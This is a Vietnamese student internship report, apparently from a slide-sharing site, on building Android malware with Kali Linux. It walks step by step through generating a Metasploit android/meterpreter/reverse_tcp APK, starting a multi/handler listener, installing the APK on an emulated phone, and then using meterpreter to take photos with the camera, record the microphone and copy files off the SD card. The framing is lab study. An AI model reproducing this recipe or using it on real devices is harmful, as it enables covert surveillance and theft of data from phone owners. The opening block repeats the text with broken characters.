tuan2

7
Sinh viên th c hi n : NGUY N QUỐC VƯƠNG . Lớp CNTT . Ca sáng 3 5 - 7 Báo cáo th c tp Đề tài 5 : Nghiên cứu các Trojan ,Malware cho phép đánh cắp dli ệu như danh sách contact , tin nh ắn trên điện thoi sdng Android và g i ra ngoài NGHIÊN CỨU CƠ CHTẠO MÃ ĐỘC TRÊN KALI LINUX - Đầu tiên , ki ểm tra đị a ch IP bng : ifconfig Đị a ch IP : 192.168.1.14 - Kh ởi động terminal và gõ dòng l nh sau: Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R > /root/Desktop/test.apk

Upload: vuong-nguyen

Post on 17-Jul-2015

30 views

Category:

Technology


0 download

TRANSCRIPT

Page 1: Tuan2

Sinh viên thực hiện : NGUYỄN QUỐC VƯƠNG . Lớp CNTT . Ca sáng 3 – 5 - 7

Báo cáo thực tập

Đề tài 5 : Nghiên cứu các Trojan ,Malware cho phép đánh cắp dữ liệu như danh sách contact ,

tin nhắn trên điện thoại sử dụng Android và gửi ra ngoài

NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX

- Đầu tiên

, kiểm tra địa chỉ IP bằng : ifconfig

Địa chỉ IP : 192.168.1.14

- Khởi động terminal và gõ dòng lệnh sau:

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R >

/root/Desktop/test.apk

Page 2: Tuan2

- Máy sẽ tạo 1 file .apk ở bên ngoài desktop , kiểm tra kích thước của file để chắc là file đã

tạo thành công

Page 3: Tuan2

- Tiếp theo gõ lệnh : msfconsole

- Sau khi msfconsole load xong , ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ

lệnh sau:

Use exploit/multi/handler

Set payload/meterpreter/reverse_tcp

Set lhost 192.168.1.14 – Địa chỉ IP đã kiểm tra ban đầu

Set lport 8080 – nhập port giống với khi tạo payload ở trên

Exploit

- Sau đó màn hình sẽ hiện ra như bên dưới , lúc này đang chờ 1 máy android mở backdoor.

Page 4: Tuan2

- Thử giả lập 1 điện thoại và tải file test.apk về và tiến hành cài đặt :

Page 5: Tuan2

- Sau khi cài đặt hoàn tất thì việc kết nối với 1 android đã được thực hiện , lúc này ở console

xuất hiện :

Page 6: Tuan2

- Ta có thể gõ lệnh help để biết được các lệnh :

Page 7: Tuan2

- Có một số lệnh cơ bản như

Để xem thông tin máy : sysinfo

Để sử dụng camera: webcam_list (xem danh sách camera)

Webcam_snap x (sử dụng camera của android)

Để ghi âm : record_mic

Lấy file từ sdcard: cd/sdcard và ls (để xem danh sách thư mục,file)

cd/sdcard/download (để tải về máy )